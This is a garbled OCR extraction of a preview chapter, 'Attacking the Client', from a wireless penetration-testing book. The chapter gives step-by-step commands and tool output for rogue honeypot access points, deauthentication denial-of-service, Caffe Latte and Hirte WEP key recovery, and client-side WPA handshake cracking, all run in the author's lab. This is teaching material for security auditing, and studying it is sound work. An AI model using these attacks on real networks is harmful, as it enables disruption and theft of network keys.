BackTrack 5 Wireless Penetration Testing Beginner`s Guide
Contents
1. Shell Konsole Session Edit View Bookmarks Settings Help CH 3 Elapsed 2 mins 2011 03 23 11 17 BSSID PWR 00 1E 40 53 02 FC 50 00 25 5E 17 C8 00 71 00 25 5E 17 C8 02 70 00 25 5E 17 C8 01 70 00 25 5E 17 C8 03 70 BSSID not associated not associated not associated not associated not associated 00 1E 40 53 02 FC RXQ Beacons Data s CH MB ENC CIPHER AUTH ESSID 1454 54 WPA TKIP PSK vivek 4 54 WEP WEP swapnil 3 54 OPN lt length 3 54 OPN lt length 3 54 OPN lt length STATION Lost Packets Probes 00 16 44 19 DF 00 24 D2 FE 7F 90 4C E5 30 42 4 00 26 B6 11 67 3 60 FB 42 D5 E4 0 C8 BC C8 EE 12 l 21 5 5 FinAirWifi 144 Wireless Lab Vivek 45 vivek S she To understand what is happening let s run Wireshark and start sniffing on the monO interface As expected you might see a lot of packets which are not relevant to our analysis Apply a Wireshark filter to only display Probe Request packets from the client MAC you are using 8U Beacon Trame SN 25 FN U Flags C BI IUU SSID VIVEK IEEE 80 Probe Request SN 1793 FN 0 Flags C SSID Broadcast IEEE 80 Probe Request SN 1795 FN 0 Flags C SSID Broadcast IEEE 80 Beacon frame SN 67 FN 0 Flags C BI 100 SSID vivek IEEE 80 Beacon frame SN 89 FN 0 Flags C BI 100 SSID vivek IEEE 80 Beacon frame SN 110 FN 0 Flags C BI 100 SSI2. Packets 584 Displayed 283 Marked 0 Dropped 0 Profile Default For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Chapter 6 5 We have now seen that even in the presence of WEP encryption it is possible to De Authenticate a client and disconnect it The same is valid even in the presence of WPA WPA2 Let us now set our access point to WPA encryption and verify the same WIRELESS NETWORK SETTINGS a X Enable Wireless Always F Add New Wireless Network Name Also called the SSID 802 11 Mode Mixed 802 11n 802 11g and 802 11b 1 Enable Auto Channel Scan O Wireless Channel 2 422 GHz CH 3 Transmission Rate Best automatic B Mbit s Channel Width 20 MHz Z Visibility Status Visible O Invisible Wireless Lab WIRELESS SECURITY MODE To protect your privacy you can configure wireless security features This device supports three wireless security modes including WEP WPA Personal and WPA Enterprise WEP is the original wireless encryption standard WPA provides a higher level of security WPA Personal does not require an authentication server The WPA Enterprise option requires an external RADIUS server Security Mode WPA Personal ws Use WPA or WPA2 mode to achieve a balance of strong security and best compatibility This mode uses WPA for legacy clients while maintaining higher security with
3. WOOANODUBWNrF OW depth byte vote 0 AB 75520 4D 56576 90 56320 3A 56064 2B 55552 B7 55552 BA 55552 CB 55552 0 CD 72704 6C 60160 7A 59904 AQ 57088 D6 56832 BC 56576 C5 56576 1 56320 0 EF 69888 ED 58368 EE 57600 AF 57344 9A 56832 51 56320 A3 56320 C5 56320 0 AB 64512 47 60416 B9 60416 5E 59392 A1 57856 82 57600 E1 57088 E7 56576 0 CD 65024 7D 59904 43 58624 F9 58112 03 57088 EE 56576 41 56320 28 55552 1 51 58112 6D 57856 72 57344 CE 57088 44 56320 5C 55808 9E 55552 05 55040 0 AB 67584 A4 58624 6D 58112 FB 57856 16 57344 A2 57088 24 56832 91 56832 0 CD 65024 8B 58112 40 57856 D5 57856 81 57344 D6 57344 DA 57088 8E 55808 0 EF 67072 F7 58880 66 58624 A8 57856 5D 57344 AQ 57344 11 57088 CC 56832 1 AB 59904 86 57856 41 57344 94 57344 0A 56576 08 56320 25 56064 A9 56064 1 2C 58112 E0 57600 FB 57344 47 56576 9D 56576 C4 56576 17 55552 21 55552 1 A8 57856 48 57600 9F 57600 34 56832 AF 56320 D7 56320 8D 56064 22 55808 1 12 57308 CE 55844 A4 55076 1B 54892 68 54784 C0 54784 66 54748 4F 54564 NP RPNBPRPRPURRPHP ER KEY FOUND AB CD EF AB CD EF AB CD EF AB CD EF 12 Decrypted correctly 100 11281 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Chapter 6 What just happened We were successful in retrieving the WEP key from just the wireless client
4. testing beginners guide book Where to buy this book You can buy BackTrack 5 Wireless Penetration Testing Beginner s Guide from the Packt Publishing website http www packtpub com backtrack 5 wireless penetration testing beginners guide book Free shipping to the US UK Europe and selected Asian countries For more information please read our shipping policy Alternatively you can buy the book from Amazon BN com Computer Manuals and most internet book retailers PACKT PUBLISHING www PacktPub com For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book
5. 60 FB 42 D5 E4 01 associated WEP to ESSID Wireless Lab 21 35 42 Client 60 FB 42 D5 E4 01 associated WEP to ESSID Wireless Lab 21 35 42 Client 60 FB 42 D5 E4 01 associated WEP to ESSID Wireless Lab 21 35 42 Client 60 FB 42 D5 E4 01 associated WEP to ESSID Wireless Lab 21 35 42 Client 60 FB 42 D5 E4 01 associated WEP to ESSID Wireless Lab 21 35 42 Client 60 FB 42 D5 E4 01 associated WEP to ESSID Wireless Lab 21 35 42 Client 60 FB 42 D5 E4 01 associated WEP to ESSID Wireless Lab 21 35 42 Client 60 FB 42 D5 E4 01 associated WEP to ESSID Wireless Lab 21 35 42 Client 60 FB 42 D5 E4 01 associated WEP to ESSID Wireless Lab 21 35 42 Client 60 FB 42 D5 E4 01 associated WEP to ESSID Wireless Lab 21 35 42 Starting Hirte attack against 60 FB 42 D5 E4 01 at 100 pps 1134 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Chapter 6 5 Westart aircrack ng as in the case of the Caffe Latte attack and eventually the key would be cracked as shown next root bt Shell Konsole lt 3 gt Session Edit View Bookmarks Settings Help Aircrack ng 1 0 r1645 00 25 36 Tested 1285089 keys got 48988 IVs byte vote AB 75520 4D 56576 90 56320 3A 56064 2B 55552 B7 55552 BA 55552 CB 55552 CD 72704 6C 60160 7A 59904 AQ 57088 D6 56832 BC 56576 C5 56576 1E 56320 EF 69888 ED 58368 EE 57600 AF 57344 9A 56832 51 56320 A3 56
6. 91 D2 8E 25 e Wireless Lab L W 1 mond 14 47 12 Created tap interface at0 14 47 12 Trying to set MTU on atO to 1500 14 47 13 Access Point with BSSID 00 21 91 D2 8E 25 started 11261 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Chapter 6 5 As soon as the client connects to this access point airbase ng starts the Caffe Latte attack as shown root bt Shell No 3 Konsole Session Edit View Bookmarks Settings Help airbase ng c 3 a 00 21 91 D2 8E 25 e Wireless Lab L W 1 mond 18 Created tap interface at0 18 Trying to set MTU on at to 1500 18 Access Point with BSSID 00 21 91 D2 8E 25 started Got 140 bytes keystream 60 FB 42 D5 E4 01 SKA from 60 FB 42 D5 E4 01 SKA from 60 FB 42 D5 E4 01 SKA from 60 FB 42 D5 E4 01 SKA from 60 FB 42 D5 E4 01 SKA from 60 FB 42 D5 E4 01 SKA from 60 FB 42 D5 E4 01 SKA from 60 FB 42 D5 E4 01 SKA from 60 FB 42 D5 E4 01 SKA from 60 FB 42 D5 E4 01 SKA from 60 FB 42 D5 E4 01 SKA from 60 FB 42 D5 E4 01 SKA from 60 FB 42 D5 E4 01 SKA from 60 FB 42 D5 E4 01 Client 60 FB 42 D5 E4 01 associated WEP ESSID Wireless Lab Client 60 FB 42 D5 E4 01 associated WEP ESSID Wireless Lab Client 60 FB 42 D5 E4 01 associated WEP ESSID Wireless Lab Client 60 FB 42 D5 E4 01 associated WEP ESSID Wireless Lab Client 60 FB 42 D5 E4 01 associated WEP ESSID Wireless Lab Client 60 FB
7. Authentication attack to break the connection Try using a Dis Association packet to break the established connection between a client and an access point We ve already seen how to conduct the Caffe Latte attack The Hirte attack extends the Caffe Latte attack using fragmentation techniques and allows for almost any packet to be used More information on the Hirte attack is available on the AIRCRACK NG website http www aircrack ng org doku php id hirte We will now use aircrack ng to conduct the Hirte attack on the same client Time for action cracking WEP with the Hirte attack 1 Create a WEP access point exactly as in the Caffe Latte attack using the airbase ng tool The only additional option is the N option instead of the L option to launch the Hirte attack root bt Shell Konsole airbase ng c 3 a 00 21 91 D2 8E 25 e Wireless Lab W 1 N mond Created tap interface at0 Trying to set MTU on at to 1500 Trying to set MTU on mon to 1800 Access Point with BSSID 00 21 91 D2 8E 25 started 11331 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Attacking the Client 2 Start airodump ng in a separate window to capture packets for the Wireless Lab Honeypot root bt Shell No 2 Konsole Session Edit View Bookmarks Settings Help airodump ng c 3 bssid 00 21 91 D2 8E 25 write Hirte mond ff 3 Airodump ng
8. FN 0 Flags C SSID Wireless Lab IEEE 80 Probe Request SN 1809 FN 0 Flags C SSID Vivek IEEE 80 Probe Request SN 1811 FN 0 Flags C SSID Vivek IEEE 80 Probe Request SN 1812 FN 0 Flags C SSID Vivek IEEE 80 Probe Request SN 1813 FN 0 Flags C SSID Vivek IEEE 80 Probe Request SN 1819 FN 0 Flags C SSID Vivek IEEE 80 Probe Request SN 1820 FN 0 Flags C SSID Wireless Lab IEEE 80 Probe Request SN 1822 FN 0 Flags C SSID Wireless Lab IEEE 80 Probe Request SN 1824 FN 0 Flags C SSID Wireless Lab IEEE 80 Probe Request SN 1830 FN 0 Flags C SSID Wireless Lab 4 Let us now start a fake access point for the network Wireless Lab on the hacker machine using the command shown next root bt Shell Konsole pn Edit View Bookmarks Settings Help root bt airbase ng essid Wireless Lab c 3 mon0 Created tap interface at0 Trying to set MTU on atO to 1500 Trying to set MTU on mon to 1800 Access Point with BSSID 00 C0 CA 3E BD 93 started 1201 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Chapter 6 5 Within a minute or so the client would connect to us automatically This shows how easy it is to have un associated clients root bt Shell Konsole Session Edit View Bookmarks Settings Help airbase ng essid
9. Konsole Menub n Edit View Bookmarks Settings Help airbase ng c 3 a 00 21 91 D2 8E 25 e Wireless Lab W 1 z 2 mond Created tap interface at0 Trying to set MTU on at to 1500 Access Point with BSSID 00 21 91 D2 8E 25 started Client 60 FB 42 D5 E4 associated WPA1 TKIP to Wireless Client 60 FB 42 D5 E4 01 associated WPA1 TKIP to Wireless Client 60 FB 42 D5 E4 01 associated WPA1 TKIP to Wireless Client 60 FB 42 D5 E4 01 associated WPA1 TKIP to Wireless Client 60 FB 42 D5 E4 01 associated WPA1 TKIP Wireless Client 60 FB 42 D5 E4 01 associated WPA1 TKIP Wireless Client 60 FB 42 D5 E4 01 associated WPA1 TKIP Wireless Client 60 FB 42 D5 E4 01 associated WPA1 TKIP Wireless Client 1FB 42 D5 E4 associated WPA1 TKIP Wireless Client 60 FB 42 D5 E4 01 associated WPA1 TKIP Wireless Client 60 FB 42 D5 E4 01 associated WPA1 TKIP Wireless Client 1FB 42 D5 E4 associated WPA1 TKIP Wireless Client 60 FB 42 D5 E4 01 associated WPA1 TKIP Wireless 137 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Attacking the Client 4 But airodump ng reports that the handshake has been captured root bt Shell No 2 Konsole on Edit View Bookmarks Settings Help CH 3 Elapsed 1 min 2011 06 27 23 57 WPA handshake 00 21 91 D2 8E 25 BSSID PWR RXQ Beacons Data s CH MB ENC CIPHER AUTH ESSID 00 21 91 D2 8E 25
10. Network List PNL on Windows based systems Also along with this list it will display any networks available in its range A hacker may do either of two things 1 Silently monitor the probe and bring up a fake access point with the same ESSID the client is searching for This will cause the client to connect to the hacker machine thinking it is the legitimate network 2 He may create fake access points with the same ESSID as neighboring ones to confuse the user to connect to him Such attacks are very easy to conduct in coffee shops and airports where a user might be looking to connect to a Wi Fi connection These attacks are called Honeypot attacks which happen due to Mis Association to the hacker s access point thinking it is the legitimate one In the next exercise we will do both these attacks in our lab Time for action orchestrating a Mis Association attack Follow these instructions to get started 1 Inthe previous labs we used a client that had connected to the Wireless Lab access point Let us switch on the client but not the actual Wireless Lab access point Let us now run airodump ng mono and check the output You will very soon find the client to be in not associated mode and probing for Wireless Lab and other SSIDs in its stored profile Vivek as shown 1181 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Chapter 6 root bt
11. PACKT m PUBLISHING BackTrack 5 Wireless Penetration Testing Beginner s Guide Vivek Ramachandran BackTrack 5 Wireless Penetration Testing Chapter No 6 Attacking the Client In this package you will find A Biography of the author of the book A preview chapter from the book Chapter NO 6 Attacking the Client A synopsis of the book s content Information on where to buy this book About the Author Vivek Ramachandran has been working on Wi Fi Security since 2003 He discovered the Caffe Latte attack and also broke WEP Cloaking a WEP protection schema publicly in 2007 at Defcon In 2011 Vivek was the first to demonstrate how malware could use Wi Fi to create backdoors worms and even botnets Earlier he was one of the programmers of the 802 1x protocol and Port Security in Cisco s 6500 Catalyst series of switches and was also one of the winners of the Microsoft Security Shootout contest held in India among a reported 65 000 participants He is best known in the hacker community as the founder of http www SecurityTube net where he routinely posts videos on Wi Fi Security Assembly Language Exploitation Techniques and so on SecurityTube net receives over 100 000 unique visitors a month For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Vivek s work on wireless security has been quoted in BBC online InfoWorld MacWorld The Register IT World Canada
12. SSID Wireless Lab root bt Shell Konsole pn Edit View Bookmarks Settings Help airbase ng essid Wireless Lab c 3 mond 12 57 27 Created tap interface at0 12 57 27 Trying to set MTU on atO to 1500 12 57 27 Access Point with BSSID 00 C0 CA 3E BD 93 started 1211 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Attacking the Client 8 Notice the client is still connected to the legitimate access point Wireless Lab root bt Shell Konsole pn Edit View Bookmarks Settings Help CH 3 Elapsed 12 s 2011 03 23 12 58 BSSID PWR RXQ Beacons Data s CH MB ENC CIPHER AUTH ESSID 00 21 91 D2 8E 25 21 87 131 5 3 54e OPN Wireless Lab 00 1E 40 53 02 FC 48 87 122 1 54 WPA TKIP PSK vivek BSSID STATION Rate Lost Packets Probes not associated 00 26 5E 1 not associated 00 26 B6 1 not associated 00 24 D6 2 00 21 91 D2 8E 25 60 FB 42 D 7 AA 93 11 6 brindavan 1 67 E5 0 2 FinAirWifi C D3 40 0 1 5 E4 01 7 171 Wireless Lab Vivek 9 We will now send broadcast De Authentication messages to the client on behalf of the legitimate access point to break their connection root bt Shell No 2 Konsole bn Edit View Bookmarks Settings Help aireplay ng deauth 0 a 00 21 91 D2 8E mon 13 32 14 Waiting for beacon frame BSSID 00 21 91 D2 8E 25 on channel 3 NB this attack is more effective when targeting a c
13. and so on This year he is speaking or training at a number of security conferences including BlackHat Defcon Hacktivity 44con HITB ML Brucon Derbycon HashDays SecurityZone SecurityByte and so on I would like to thank my lovely wife for all the help and support during the book s writing process my parents grandparents and sister for believing in me and encouraging me for all these years and last but not the least I would like to thank all the users of SecurityTube net who have always been behind me and supporting all my work You guys rock For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book BackTrack 5 Wireless Penetration Testing Beginner s Guide Wireless Networks have become ubiquitous in today s world Millions of people use them worldwide every day at their homes offices and public hotspots to log on to the Internet and do both personal and professional work Even though wireless makes life incredibly easy and gives us such great mobility it comes with its risks In recent times insecure wireless networks have been exploited to break into companies banks and government organizations The frequency of these attacks has only intensified as the network administrators are still clueless on how to secure wireless in a robust and foolproof way BackTrack 5 Wireless Penetration Testing Beginner s Guide is aimed at helping the reader understand the insecurities
14. associated with wireless networks and how to conduct penetration tests to find and plug them This is an essential read for those who would like to conduct security audits on wireless networks and always wanted a step by step practical guide for the same As every wireless attack explained in this book is immediately followed by a practical demo the learning is very complete We have chosen BackTrack 5 as the platform to test all the wireless attacks in this book BackTrack as most of you may already be aware is the world s most popular penetration testing distribution It contains hundreds of security and hacking tools some of which we will use in this course of this book What This Book Covers Chapter 1 Wireless Lab Setup introduces dozens of exercises that we will be doing in this book In order to be able to try them out the reader will need to set up a wireless lab This chapter focuses on how to create a wireless testing lab using off the shelf hardware and open source software We will first look at the hardware requirements which include wireless cards antennas access points and other Wi Fi enabled devices then we will shift our focus to the software requirements which include the operating system Wi Fi drivers and security tools Finally we will create a test bed for our experiments and verify different wireless configurations on it Chapter 2 WLAN and its Inherent Insecurities focuses on the inherent design flaws in wirel
15. best practices after a wireless penetration test Appendix A Conclusion and Road Ahead concludes the book and leaves the user with some pointers for further reading and research For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Security is just as strong as the weakest link Famous Quote in Information Security Domain infrastructure and don t give the wireless client even a fraction of that However it is interesting to note that a hacker can gain access to the authorized network by compromising a wireless client as well Q Most penetration testers seem to give all the attention to the WLAN In this chapter we will shift our focus from the WLAN infrastructure to the wireless client The client can be either a connected or isolated un associated client We will look at various attacks which can be used to target the client We will cover the following Honeypot and Mis Association attacks Caffe Latte attack De Authenticaton and Dis Association attacks Hirte attack AP less WPA Personal cracking For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Attacking the Client Honeypot and Mis Association attacks Normally when a wireless client such as a laptop is turned on it will probe for the networks it has previously connected to These networks are stored in a list called the Preferred
16. of the authorized network using just the client The attack does not require the client to be anywhere close to the authorized WEP network It can crack the WEP key using just the isolated client In the next exercise we will retreive the WEP key of a network from a client using the Caffe Latte attack Time for action conducting the Caffe Latte attack Follow these instructions to get started 1 Let us first set up our legitimate access point with WEP for the network Wireless Lab with the key ABCDEFABCDEFABCDEF12 in Hex 1124 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Chapter 6 WIRELESS NETWORK SETTINGS Enable Wireless 4 Always F Add New Wireless Network Name Wireless Lab Also called the SSID 802 11 Mode Mixed 802 11n 802 119 and 802 11b E Enable Auto Channel Scan O Wireless Channel 2 422 GHz CH3_ Transmission Rate Best automatic F Mbit s Channel Width 20MHz iw Visibility Status Visible O Invisible WIRELESS SECURITY MODE To protect your privacy you can configure wireless security features This device supports three wireless security modes including WEP WPA Personal and WPA Enterprise WEP is the original wireless encryption standard WPA provides a higher level of security WPA Personal does not require an authentication server The WPA Enterprise option requires an external RADIUS se
17. stations that are WPA2 capable Also the strongest cipher that the client supports will be used For best security use WPA2 Only mode This mode uses AES CCMP cipher and legacy stations are not allowed access with WPA security For maximum compatibility use WPA Only This mode uses TKIP cipher Some gaming and legacy devices work only in this mode To achieve better wireless performance use WPA2 Only security mode or in other words AES cipher WPA Mode wzo E Cipher Type AES B Group Key Update Interval 3600 seconds PRE SHARED KEY Enter an 8 to 63 character alphanumeric pass phrase For good security it should be of ample length and should not be a commonly known phrase Pre Shared Key 131 personal information Enable Auto Channel Scan so that the router can select the best possible channel for your wireless network to operate on Enabling Hidden Mode is another way to secure your network With this option enabled no wireless clients will be able to see your wireless network when they scan to see what s available For your wireless devices to connect to your router you will need to manually enter the Wireless Network Name on each device If you have enabled Wireless Security make sure you write down the Key or Passphrase that you have configured You will need to enter this information on any wireless device that you connect to your wireless network For More Infor
18. will now start monitoring this network and storing the packets in Hirte 01 cap file 9 root bt Shell No 2 Konsole A Session Edit View Bookmarks Settings Help CH 3 Elapsed 16 s 2011 06 27 21 34 BSSID PWR RXQ Beacons Data s CH MB ENC CIPHER AUTH ESSID 00 21 91 D2 8E 25 100 386 0 0 3 54 WEP WEP Wireless Lab BSSID STATION PWR Rate Lost Packets Probes 4 Once the roaming client connects to out Honeypot AP the Hirte attack is automatically launched by airbase ng a root bt Shell Konsole Sas Session Edit View Bookmarks Settings Help 21 32 14 Trying to set MTU on mond to 1800 s 21 32 14 Access Point with BSSID 00 21 91 D2 8E 25 started 21 35 42 Got 140 bytes keystream 60 FB 42 D5 E4 01 21 35 42 SKA from 60 FB 42 D5 E4 01 21 35 42 SKA from 60 FB 42 D5 E4 01 21 35 42 SKA from 60 FB 42 D5 E4 01 21 35 42 SKA from 60 FB 42 D5 E4 01 21 35 42 SKA from 60 FB 42 D5 E4 01 21 35 42 SKA from 60 FB 42 D5 E4 01 21 35 42 SKA from 60 FB 42 D5 E4 01 21 35 42 SKA from 60 FB 42 D5 E4 01 21 35 42 SKA from 60 FB 42 D5 E4 01 21 35 42 SKA from 60 FB 42 D5 E4 01 21 35 42 SKA from 60 FB 42 D5 E4 01 21 35 42 Client 60 FB 42 D5 E4 01 associated WEP to ESSID Wireless Lab 21 35 42 Client 60 FB 42 D5 E4 01 associated WEP to ESSID Wireless Lab 21 35 42 Client 60 FB 42 D5 E4 01 associated WEP to ESSID Wireless Lab 21 35 42 Client 60 FB 42 D5 E4 01 associated WEP to ESSID Wireless Lab 21 35 42 Client
19. 0 100 1254 34 3 54 WPA TKIP PSK Wireless Lab BSSID STATION PWR Rate Lost Packets Probes 00 21 91 D2 8E 25 60 FB 42 D5 E4 01 18 1 1 i 73 5 Werun the airodump ng capture file through aircrack ng with the same dictionary file as before eventually the passphrase is cracked as shown next 5 root bt Shell Konsole lt 2 gt Session Edit View Bookmarks Settings Help Aircrack ng 1 0 r1645 00 176 keys tested 382 44 k s KEY FOUND QALE Master Key C1 F1 E5 BD F5 E8 1A A4 A2 5B D6 F3 F1 1A CD 7E 9A B3 Transient Key E5 1B AF B9 CE 80 EB 5C 52 2E 30 8C A5 A8 7B 90 4C 7A DD 6B BB 28 02 38 6B 3A B4 99 2C 02 98 52 5A F7 12 3A EAPOL HMAC 3D 3C OF 8E 65 OF 2C CD 37 fj What just happened We were able to crack the WPA key with just the client This was possible because even with just the first two packets we have all the information required to launch a dictionary attack on the handshake 1381 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Chapter 6 Have a go hero AP less WPA cracking We would recommend setting different WEP keys on the client and trying this exercise a couple of times to gain confidence You may notice many times that you have to reconnect the client to get it to work Pop quiz attacking the client 1 What encryption key can Caffe Latte attack recover a None b WEP c WPA d WPA2 2
20. 0 21 91 D2 8E 25 mond 10 27 19 Waiting for beacon frame BSSID 00 21 91 D2 8E 25 on channel 3 10 27 20 Sending 64 directed DeAuth STMAC 60 FB 42 D5 E4 01 32 65 ACKs Settings Help 4 The client gets disconnected and tries to reconnect to the access point we can verify this by using Wireshark just as before file Edit View Go Capture Analyze Statistics Telephony Jools Help Bwa e eazo KO EC54 60 Filter wlan addr 60 fb 42 d5 64 01 Expression Clear Apply CEOE Salk BMAX a 010 60 fb 42 d5 e4 01 00 21 020 8e 25 00 00 07 OO 314 gt Frame 119 38 bytes on wire 304 bits 38 bytes captured 304 bits P Radiotap Header vO Length 12 7 IEEE 802 11 Deauthentication Flags Type Subtype Deauthentication 0x0c Frame Control Ox0Oco Normal Duration Destination address Apple_dS e4 01 60 fb 42 d5 e4 01 Source address D Link_d2 8e 25 00 21 91 d2 8e 25 BSS Id D Link_d2 8e 25 00 21 91 d2 8e 25 Fragment number Sequence number O b gt IEEE 802 11 wireless LAN management frame pare 00 00 Gc 00 04 80 00 OD 02 00 18 OO cO 00 3a 01 91 d2 8e 25 00 21 91 d2 No Time Source Destination Protoco info 400 7 549932 D Link_d2 8e 25 Apple_d5 e4 01 IEEE 80 Deauthentication SN 108 FN lt O 401 7 552121 Apple_d5 e4 01 D Link_d2 8e 25 IEEE 80 Deauthentication SN 109 FN 0 403 7 556724 D Link_d2 6e 25 IEEE
21. 2 8e 25 IEEE 80 Deauthentication gt Frame 3 56 bytes on wire 448 bits 56 bytes captured 448 bits gt Radiotap Header vO Length 26 7 IEEE 802 11 QoS Null function No data Flags R TC Type Subtype QoS Null function No data 0x2c Frame Control 0x09C8 Normal Duration 258 BSS Id D Link_d2 8e 25 00 21 91 d2 8e 25 Source address Apple_d5 e4 01 60 fb 42 d5 e4 01 Destination address D Link_d2 8e 25 00 21 91 d2 8e 25 Fragment number O Sequence number 480 gt Frame check sequence OxaecSO193 correct 010 10 30 76 09 cO 00 f6 O1 GO 00 c8 09 02 O1 00 21 020 91 d2 Be 25 60 fb 42 d5 e4 0l OO 21 91 d2 Be 25 030 00 le 07 OO ae c5 01 93 z 00 00 la 00 2f 48 00 00 13 Oc 78 32 02 00 00 00 File tmp wiresharloooxseOdaG 8 _ Packets 702 Displayed 414 Marked 0 Dropped 0 Profile Default 1321 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Chapter 6 What just happened We just learnt how to disconnect a wireless client selectively from an access point using De Authentication frames even in the presence of encryption schemas like WEP WPA WPA2 This was done by sending a De Authentication packet to just the access point client pair instead of sending a broadcast De Authentication to the entire network Have a go hero Dis Association attack on the client In the preceding exercise we used a De
22. 320 C5 56320 AB 64512 47 60416 B9 60416 5E 59392 A1 57856 82 57600 E1 57088 E7 56576 CD 65024 7D 59904 43 58624 F9 58112 03 57088 EE 56576 41 56320 28 55552 51 58112 6D 57856 72 57344 CE 57088 44 56320 5C 55808 9E 55552 05 55040 AB 67584 A4 58624 6D 58112 FB 57856 16 57344 A2 57088 24 56832 91 56832 CD 65024 8B 58112 40 57856 D5 57856 81 57344 D6 57344 DA 57088 8E 55808 EF 67072 F7 58880 66 58624 A8 57856 5D 57344 AQ 57344 11 57088 CC 56832 AB 59904 86 57856 41 57344 94 57344 0A 56576 08 56320 25 56064 A9 56064 2C 58112 EQ 57600 FB 57344 47 56576 9D 56576 C4 56576 17 55552 21 55552 A8 57856 48 57600 9F 57600 34 56832 AF 56320 D7 56320 8D 56064 22 55808 12 57308 CE 55844 A4 55076 1B 54892 68 54784 C0 54784 66 54748 4F 54564 B 0 1 2 3 4 5 6 7 8 9 NP RPNRPRPRPURRPR PH KEY FOUND AB CD EF AB CD EF AB CD EF AB CD EF 12 Decrypted correctly 100 What just happened We launched the Hirte attack against a WEP client which was isolated and away from the authorized network We cracked the key exactly as in the Caffe Latte attack case Have a go hero practice practice practice We would recommend setting different WEP keys on the client and trying this exercise a couple of times to gain confidence You may notice many times that you have to reconnect the client to get it to work In a previous chapter we have seen how to crack WPA WP
23. 42 D5 E4 01 associated WEP ESSID Wireless Lab Client 60 FB 42 D5 E4 01 associated WEP ESSID Wireless Lab Client 60 FB 42 D5 E4 01 associated WEP ESSID Wireless Lab Client 60 FB 42 D5 E4 01 associated WEP ESSID Wireless Lab Client 60 FB 42 D5 E4 01 associated WEP ESSID Wireless Lab Client 60 FB 42 D5 E4 01 associated WEP ESSID Wireless Lab Client 60 FB 42 D5 E4 01 associated WEP ESSID Wireless Lab Starting Caffe Latte attack against 60 FB 42 D5 E4 01 at 100 pps 6 Wenowstart airodump ng to collect the data packets from this access point only as we did before in the WEP cracking case root bt Shell Konsole lt 2 gt Session Edit View Bookmarks Settings Help CH 11 Elapsed 30 mins 2011 02 06 04 01 140 bytes keystream 00 21 91 D2 8E 25 BSSID PWR RXQ Beacons Data s CH MB ENC CIPHER AUTH ESSID 00 21 91 D2 8E 25 6 100 16387 11190 0 11 54e WEP WEP SKA Wireless Lab BSSID STATION PWR Rate Lost Packets Probes 00 21 91 D2 8E 25 60 FB 42 D5 E4 01 0 0 22026 Wireless Lab 127 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Attacking the Client 7 Wealso start aircrack ng as in the WEP cracking exercise we did before to begin the cracking process The command line would be aircrack ng filename where filename is the name of the file created by airodump ng 6 root bt Shell Konsole lt 3 gt Session Edit Vi
24. 80 Deauthentication SN 110 FN 0 404 7 557491 IEEE 80 Deauthentication SN 108 FN 0 405 7 557493 IEEE 80 Deauthentication SN 109 FN 0 406 7 559783 IEEE 80 Deauthentication SN 111 FN 9 408 7 564329 D Link_d2 8e 25 IEEE 80 Deauthentication SN 112 FN 0 4107 566480 apple_d5 e4 01 D Link_d2 8e 25 IEEE 80 Deauthentication SN 113 FN 0 z 411 7 568434 Apple_d5 e4 01 Broadcast IEEE 80 Probe Request SN 2674 FN 0 Flags C SSID Broadcast 412 7 569799 D Link_d2 8e 25 Apple_ds IEEE 80 Deauthentication SN 114 FN 0 Flag 413 7 571247 D Link_d2 86 25 Apple_ds IEEE 80 Probe Response SN 3054 FN 0 Flags C BI 100 SSTD Wireless Lab 415 7 572149 Apple_d5 e4 01 D Link_d2 8e 25 IEEE 80 Deauthentication SN 115 FN 0 418 7 575565 D Link_d2 6e 25 Apple_d5 e4 01 IEEE 80 Deauthentication SN 116 FN 9 419 7 577873 D Link_d2 8e 25 IEEE 80 Deauthentication SN 117 FN 0 422 7 581004 Apple_d5 IEEE 80 Deauthentication SN 110 FN 0 423 7 581005 D Link_d IEEE 0 Deauthentication SN 111 FN 0 424 7 581006 Apple_ds IEEE 80 Deauthentication SN 112 FN 0 425 7 581007 D Link_d IEEE 80 Deauthentication SN 113 FN 0 426 7 581008 Apple_ds IEEE 80 Deauthentication SN 114 FN 0 427 7 581009 D Link_d2 8e 25 IEEE 0 Deauthentication SN 115 FN 0 428 7 581010 D Link_d2 8e 25 Apple_d5 e4 01 IEEE 80 Deauthentication SN 116 FN 0 429 7 581011 Apple_d5 e4 01 D Link_d2 8e 25 IEEE 80 Deauthentication SN 117 FN 0 File tmpiwiresharkXXXXBLUTNE 6
25. A Honeypot access point would typically use a No Encryption Open Authentication b No Encryption Shared Authentication c WEP Encryption Open Authentication d None of the above 3 Which one of the following are DoS Attacks a Mis Association attack b De Authentication attacks c Dis Association attacks d Both b and c 4 A Caffe Latte attack requires a That the wireless client be in radio range of the access point b That the client contains a cached and stored WEP key c WEP encryption with at least 128 bit encryption d Both a and c 139 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Attacking the Client Summary In this chapter we have learned that even the wireless client is susceptible to attacks These include the following Honeypot and other Mis Association attacks Caffe Latte attack to retrieve the key from the wireless client De Authentication and Dis Association attacks causing a Denial of Service Hirte attack as an alternative to retrieving the WEP key from a roaming client and finally cracking the WPA Personal passphrase with just the client In the next chapter we will use all our learning until now to conduct various advanced wireless attacks on both the client and infrastructure side So quickly flip the page to the next chapter 1401 For More Information www packtpub com backtrack 5 wireless penetration
